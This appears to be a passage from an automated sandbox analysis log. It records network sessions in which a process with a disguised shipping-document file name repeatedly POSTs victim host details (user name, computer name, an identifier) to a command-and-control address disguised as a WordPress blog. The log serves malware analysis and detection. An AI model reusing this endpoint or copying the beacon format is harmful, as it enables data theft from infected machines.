Apr 25, 2024 09:43:43.536063910 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:43.536154032 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49830	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:43.798729897 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:43.932180882 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:44.762820005 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:43 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:44.762876034 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:44.762922049 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:44.771212101 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:44.771611929 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:44.771673918 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:44.771819115 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:44.771982908 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:44.772037983 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:44.772108078 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49831	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:45.029470921 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:45.160764933 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:45.973225117 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:45 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:45.973303080 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:45.973407984 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:45.982270956 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:45.982592106 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:45.982779026 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:45.982985020 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:45.983175039 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:45.983191967 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:45.983375072 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49832	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:46.244048119 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:46.369883060 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:47.205128908 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:46 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:47.205267906 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:47.205307961 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:47.213737011 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:47.214083910 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:47.214246035 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:47.214337111 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:47.214494944 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:47.214539051 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:47.214576960 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49833	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:47.479485035 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:47.606699944 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:48.415240049 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:47 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:48.415296078 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:48.415328979 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:48.425446987 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:48.425626993 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:48.425743103 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:48.425856113 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:48.426044941 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:48.426086903 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:48.426125050 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49834	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:48.680283070 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:48.807760000 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:49.635854959 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:48 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:49.635963917 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:49.646401882 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:49.646917105 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:49.646954060 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
